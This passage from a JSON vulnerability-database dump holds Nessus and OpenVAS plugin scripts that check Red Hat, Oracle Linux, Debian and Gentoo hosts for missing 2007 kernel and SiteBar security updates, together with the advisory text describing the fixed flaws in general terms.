security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", 
"cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:07:51", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix various security issues in the Red\nHat Enterprise Linux 5 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. 
(CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\npackages, which contain backported patches to resolve these issues.\n\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil\nKettle for reporting the security issues corrected by this update.", "modified": "2018-11-16T00:00:00", "published": "2007-11-30T00:00:00", "id": "REDHAT-RHSA-2007-0993.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=28363", "title": "RHEL 5 : kernel (RHSA-2007:0993)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0993. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(28363);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(25807, 26337);\n script_xref(name:\"RHSA\", value:\"2007:0993\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2007:0993)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix various security issues in the Red\nHat Enterprise Linux 5 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new 
kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\npackages, which contain backported patches to resolve these issues.\n\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil\nKettle for reporting the security issues corrected by this update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4997\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-5494\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0993\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0993\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-2.6.18-53.1.4.el5\")) 
flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"kernel-doc-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", 
reference:\"kernel-xen-devel-2.6.18-53.1.4.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:16:26", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2007:0993 :\n\nUpdated kernel packages that fix various security issues in the Red\nHat Enterprise Linux 5 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. 
(CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\npackages, which contain backported patches to resolve these issues.\n\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil\nKettle for reporting the security issues corrected by this update.", "modified": "2018-07-18T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2007-0993.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67595", "title": "Oracle Linux 5 : kernel (ELSA-2007-0993)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0993 and \n# Oracle Linux Security Advisory ELSA-2007-0993 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67595);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(25807, 26337);\n script_xref(name:\"RHSA\", value:\"2007:0993\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2007-0993)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0993 :\n\nUpdated kernel packages that fix various security issues in the Red\nHat Enterprise Linux 5 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe 
Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\npackages, which contain backported patches to resolve these issues.\n\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil\nKettle for reporting the security issues corrected by this update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-November/000419.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) 
audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", 
reference:\"kernel-xen-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-53.1.4.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:49", "bulletinFamily": "scanner", "description": "The remote host is missing an update to sitebar\nannounced via advisory DSA 1423-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=59958", "id": "OPENVAS:59958", "title": "Debian Security Advisory DSA 1423-1 (sitebar)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1423_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1423-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in sitebar, a\nweb based bookmark manager written in PHP. The Common Vulnerabilities\nExposures project identifies the following problems:\n\nCVE-2007-5491\nA directory traversal vulnerability in the translation module allows\nremote authenticated users to chmod arbitrary files to 0777 via ..\nsequences in the lang parameter.\n\nCVE-2007-5492\nA static code injection vulnerability in the translation module allows\na remote authenticated user to execute arbitrary PHP code via the value\nparameter.\n\nCVE-2007-5693\nAn eval injection vulnerability in the translation module allows\nremote authenticated users to execute arbitrary PHP code via the\nedit parameter in an upd cmd action.\n\nCVE-2007-5694\nA path traversal vulnerability in the translation module allows\nremote authenticated users to read arbitrary files via an absolute\npath in the 'dir' parameter.\n\nCVE-2007-5695\nAn error in command.php allows remote attackers to redirect users\nto arbitrary web sites via the forward parameter in a Log In action.\n\nCVE-2007-5692\nMultiple cross site scripting flaws allow remote attackers to inject\narbitrary script or HTML fragments into several scripts.\n\n\nFor the stable distribution (etch), these problem have been fixed in version\n3.3.8-7etch1.\n\nFor the old stable distribution (sarge), these problems have been fixed in\nversion 3.2.6-7.1sarge1\n\nFor the unstable distribution (sid), these problems have been fixed in version\n3.3.8-12.1.\n\nWe recommend that you upgrade your sitebar package.\";\ntag_summary = \"The remote host is missing an update to sitebar\nannounced via advisory DSA 
1423-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201423-1\";\n\nif(description)\n{\n script_id(59958);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:23:47 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-5491\", \"CVE-2007-5492\", \"CVE-2007-5693\", \"CVE-2007-5694\", \"CVE-2007-5695\", \"CVE-2007-5692\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1423-1 (sitebar)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"sitebar\", ver:\"3.2.6-7.1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sitebar\", ver:\"3.3.8-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "description": "The remote host is missing updates 
announced in\nadvisory GLSA 200711-05.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58744", "id": "OPENVAS:58744", "title": "Gentoo Security Advisory GLSA 200711-05 (sitebar)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple issues have been identified in SiteBar that might allow execution\nof arbitrary code and arbitrary file disclosure.\";\ntag_solution = \"All SiteBar users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/sitebar-3.3.9'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200711-05\nhttp://bugs.gentoo.org/show_bug.cgi?id=195810\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200711-05.\";\n\n \n\nif(description)\n{\n script_id(58744);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-5491\", \"CVE-2007-5492\", \"CVE-2007-5692\", \"CVE-2007-5693\", \"CVE-2007-5694\", \"CVE-2007-5695\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200711-05 (sitebar)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. 
